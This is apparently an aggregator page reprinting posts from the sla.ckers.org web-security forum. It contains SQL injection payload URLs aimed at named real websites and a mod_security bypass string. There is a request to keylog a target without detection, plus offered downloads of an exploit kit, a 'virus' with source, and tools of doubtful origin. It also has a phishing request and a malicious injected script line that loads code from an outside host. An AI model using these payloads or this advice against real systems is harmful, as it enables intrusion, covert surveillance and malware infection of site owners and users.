sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

Where do I download the Mac version of Ruby Version Manager (if there even is one)? (no replies)


So, I'm looking into downloading the Mac OS X version of BeEF, but I read that I need to install Ruby Version Manager in order to use it. I've Googled for that, but I can't seem to find a download link in any of the sites that talk about it. One of them is even titled "Download Ruby", but what I've just downloaded there has turned out to be a Unix application.

I don't have Unix, only Windows and Macintosh (and I'd prefer to use Mac), and I'd rather not spend money on a whole new operating system given how constantly short of funds I happen to be. Since Unix is also an operating system just like Mac OS X, what is the point of having a version of a program designed specifically for Mac if it requires the installation of a Unix Application? And yes, there does exist a Mac version, if the following pages are anything to go by:

https://github.com/beefproject/beef/wiki/Installation
https://github.com/beefproject/beef/wiki/MAC-OSX-installation-using-RVM

Anything I should know about using a keylogger and what kind I should use? (3 replies)


Just found out about keyloggers yesterday. Sites that either try to promote them or objectively state how they work claim that they are untraceable and cannot be detected. However, I know that if I were to bring it up with anyone outside this forum, they'd only warn me about the risk I'd be running of being traced back should anyone actually find out.

Since I use Mac OS X and would like not to spend money on any of these things, I had downloaded MacKeyLogger.dmg as of yesterday. However, if there are better ones I should look for in order to avoid detection by anyone, I'll be glad to hear from someone here.

Also, I know that they're supposed to operate in total stealth, but is it possible for a potential target to have software installed on their computer that would alert them should a keylogger be introduced to their machine?

Is there anything else I should know about this subject?

XSS Scanner BETA 1.1 (no replies)


XSS Scanner is a simple application that will search for common XSS vulnerabilities in a site.

How to use:
1) Type a site with query parameter
2) Click on Send
3) Wait a few seconds; if an XSS is found it will pop up an alert.

Note: Not all the XSS available out there is included in this application because some of them will break the code; nevertheless, it is a great app that comes in handy.

Download:
[www.firedrive.com]

ZoneAlarm Antivirus - anti-spyware Scan Module (no replies)


This DOS application will detect if Zone Alarm is installed and perform a security scan using the scanning module of ZoneAlarm Antivirus.

Download:
http://www.4shared.com/file/H2OU49otba/ZoneAlarm_Antivirus_-_anti-spy.html
http://dfiles.eu/files/jsb64mdsi
https://www.firedrive.com/file/2D45A18AFF2A7D28
http://ge.tt/31Y3aEu1/v/0
http://hitfile.net/OPhQ
https://www.mediafire.com/?jwt982lvxr7wu3t
http://rg.to/file/c10057274c36bee76eeca53bcdd67da6/ZoneAlarm_Antivirus_-_anti-spyware_Scan_Module.exe.html
http://uploaded.net/file/rpj7lx5t
http://ryushare.com/aleft87svczt/ZoneAlarm_Antivirus_-_anti-spyware_Scan_Module.exe
http://mightyupload.com/poywe4r8bele/ZoneAlarm_Antivirus_-_anti-spyware_Scan_Module.exe.html

Make a null in outlook/live/hotmail account (no replies)


This trick will hide the inbox emails in outlook/live/hotmail site.

Just log in to an Outlook account and paste the code below in the browser.

http://dub126.mail.live.com/default.aspx?fid=flinbox&fltid=2

VEK - Vulnerability Exploit Kit PREVIEW RELEASE (1 reply)


Here is a PREVIEW RELEASE of what I have been doing in the past month.

VEK is a software that exploits vulnerabilities in various online scripts.
Basically what it does is give the user an interface where exploiting sites is very easy.
In two steps a user can exploit a forum, site or server.

MD5: DEC38F51D69A7FC6CE1245D8B80E647A

Download: (59,18 MB)
[uploaded.net]

bypass & (1 reply)


hi bro...

I wanna inject a command into a URL but I cannot because I cannot add "&" to the URL. Also I used "%26" instead of "&" but it was not accepted.
What can I do?

Proxy Browser BETA 1.1 - Surf the internet anonymously (no replies)


Proxy Browser is a Windows application that will give you access to different proxy servers.

It is quite simple to use:
1) Install the application
2) Run Proxy Browser
3) Type the address and navigate the net

For a new proxy, close the window and run Proxy Browser again

EXTRA: Updates are available by email privateloader@hotmail.com

Download:
[www.firedrive.com]

Virustotal:
[www.virustotal.com]

Microsoft - Malware & Exploits (no replies)


And they say that Microsoft is not a malicious organization, lol?

Test this link
http://download.cloudantivirus.com/eng/malicious/?url=microsoft.com
http://www.siteadvisor.com/restricted.html?domain=http:%2F%2Fmicrosoft.com

Proxy Browser - Surf the internet anonymously (no replies)


Proxy Browser is a Windows application that will give you access to different proxy servers.

It is quite simple to use:
1) Install the application
2) Run Proxy Browser
3) Type the address and surf the net

For a new proxy, close the window and run Proxy Browser again

EXTRA: Updates are available by email privateloader@hotmail.com

Download:
[www.firedrive.com]

Virustotal:
[www.virustotal.com]

Acer E1-510 - Windows 8.1 Resources Booster (no replies)


Optimize your Acer E1-150 or any Windows 8.1 operating system, making it run even faster by closing native applications.


->Note: Consider using Autoruns from Microsoft to disable them...


Download:
https://www.mediafire.com/?qr3bdfg0f5x3o34

Virustotal:
https://www.virustotal.com/pt/file/a9899337344a2dd74fb42b1b9d790e7ce19186a8f9bf19587d8ca7e88367ab6c/analysis/1408141574/

XSS Scanner BETA 1.0 (no replies)


This software will scan a site looking for XSS vulnerabilities.
It is easy to use: it only requires that a user type the address + search parameter in order to scan.

The scan is clean and if a vulnerability passes through, an alert will pop up with a vuln number.
Check the source to get the XSS code...

Warning: This is a new project, the XSS database is a bit small.

Download:
http://www.mediafire.com/download/0kbj6cd4vroussa/XSS_Scanner_BETA_1.0.rar

Virustotal:
https://www.virustotal.com/pt/file/e5ec7e5b22a095049908a0f20ba0a1e39ffe5d2c1570db3abaf3dfad9832662d/analysis/1407939128/

sql injection error with string pass (no replies)


please can anyone explain me how to fix error to inject it

http://www.pakcyber.com/portfolio.php?start=news

Sqli Injection Bypass (1 reply)


Hello ...

i have just a doubt please help

suppose we have 11 dynamic pages in a website like as

index.php?id=1 ( page ok )
index.php?id=2 ( page ok )
index.php?id=3 ( page ok )
index.php?id=4 ( page ok )
index.php?id=5 ( page ok )
index.php?id=6 ( page ok )
index.php?id=7 ( page ok )
index.php?id=8 ( page ok )
index.php?id=9 ( page ok )
index.php?id=10 ( page ok )
index.php?id=11 ( page ok )
index.php?id=12 ( Blank page no output instantly )

security enabled : Mod_Security & comment escaped
mode security bypassed with /*!UNIunionON*/ ALL /*!SEselectLECT*/ but now the page shows same redirecting at single page suppose it 11th page
how can i bypass this security ?

i think injection is Time based Blind
Can i bypass such injections ??

[Virus] Windows 8 Resources Blocker + Source (no replies)


This is a virus for Windows 8 and basically what it does is use the function taskkill to terminate common Windows 8 executables.

Effects:
1) It will close various executables.
2) The CPU will go to 100% as it works in a loop.

Check the source for more details.

Download:
http://www.firedrive.com/file/73E2817DD73AEEE7

Password:
http://tinyurl.com/pfganfq

any useful auto database? (no replies)


Hi,

Does anyone know of any useful automotive database?

Hacked, cracked, etc

dom xss is possible ? (no replies)


dom xss is possible in ie browsers in code ?
<html>
<head>
<script language="JavaScript">
function onLoad() {
parent.setTimeout("zk.bmk.onIframeLoaded('"+window.location+"')",0);
}
</script>
</head>
<body onload="onLoad()">
</body>
</html>

is located in http://grepcode.com/file/repo1.maven.org/maven2/org.zkoss.zk/zk/6.5.1.1/web/js/zk/bookmark.html


in ie8 browser injection in url ');// error message zk undefined, bmk null or undefined.
How is reproduce injection dom xss ?

The sql injection (1 reply)


For this sql injection,how to bypass IT?

http://www.premises.com.au/residetails.php?id=6140725


http://www.premises.com.au/residetails.php?id=6140725'

NFC Security (no replies)


Hi guys,
I was redirected here by a friend to ask a few questions. I hope this thread will not be a one-reply topic but a section where we'll discuss security in NFC tags and readers.
He tried to answer a few of my questions but I hope for other answers.

I'm a 20 year old student, and as my homework I got NFC security.
Before I start, let me tell you about my equipment: I own this device and a tag (actually 3 tags: the paper, a key, and a card).

w w w. s8.postimg.org/aek39k2it/photo1.jpg

Now my "homework" is to find a security hole/try to break it/ in school where the system is set up so that the tag reader identifies a tag by the ID of the tag and if the tag is located in the database it allows access to the room.

I need to get into it without knowing any tags; actually I know them, but that's not the point.

~Can NFC Tag ID be changed or can it be controlled by a script ?
~ If so how ?

~Can I bruteforce NFC reader using HCE NFC phone / device ?
~ If so how ?

~Does the reader that I have (ACS.com.hk manufacture, ACR122) keep logs ?
(tried to find out but without success)

That is for the beginning. I hope you guys will help me with my study, I would appreciate it very much.

Identify base64 looking text (no replies)


Hi,
while searching for injection points I came across a base64-looking argument to the id param. Can anyone help me identify what it is exactly and how to decode/encode it? It isn't base64, I tried decoding it.

http://u.laaptu.com/login1.action?id=0mYOgRQ6Hqmry/ianstwtUOz5SJOVqi59VoLNz0uwSE=

Exploitable (no replies)


Hi guys can you give me the status of this parameter ?

http://www.bhtelecom.ba/laptopi-detalji.html?&tx_ssgenericrenderer_pi1[uid]=12

edit smb_relay.rb (no replies)


Hello,
I have been trying to figure out how to modify the smb_relay.rb Metasploit module to use the same session that is created for uploading a payload to a share, and use it to download all files in the share to /tmp/loot. Has anyone done this before? Any help would be much appreciated. Thank you.

Change user (2 replies)


Is it possible to change user using SQL injection ?
So you can get privileges ?

Greetings (1 reply)


Hello all,
I'm an unprofessional pentester/blackhat for hire who's looking to share knowledge and expand my current social circle with other knowledgeable people in the field, power in numbers y'know?

It's a pity this forum looks slightly dead for the current time, I hope that will change.

Cheers,
nopesled

injection alters javascript file (1 reply)


OK here's the dealio, I am asked to code a bookings page for a taxi firm I used to work for using PHP/MySQL. The owner won't pay much so I don't sanitize user input etc. and generally do a half-arsed job hoping, maybe, that I'll be asked back to do some more work on it and get paid more.
Well it kinda works out for me as some attacker manages to re-write an included JavaScript file so that it does this (appended to the included js file):
document.write('<script type="text/javascript" src="http://www.kyasshingu-shinsa-a1.asia/7nqth9gv.php?id=100737776"></script>');

So my question is this. How did he/she (the attacker) alter this file?
Did they get the FTP password? If so, how? What other avenues did/could they use to alter this file?

The js file only provided form validation, checking if boxes were filled in etc.

P.S. I won't be so neglectful in future even though I did get paid extra for sorting my own mess out!

Thanks for any insights in advance.

h! iam lggoloza (1 reply)


I am lggoloza from China

good at: XSS, Linux kernel drivers, intranet penetration

Namaste! (1 reply)


Namaste, everyone, am new here, can anyone help me in Phishing!

another one (no replies)


http://www.recreatingeden.com/index.php?pid=8+order+by+5--+

I don't have permission ?_?

why this 400 bad request?? (5 replies)


order by and union all select works

but injections to retrieve data not^^ why?

http://www.piemontfungo.com/store/index.php?prod=1888+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database%28%29

i need to refresh my memory... (2 replies)


omg i need to remember some sqlinj^^

http://www.pubblicitafaidate.it/index.php?prod=96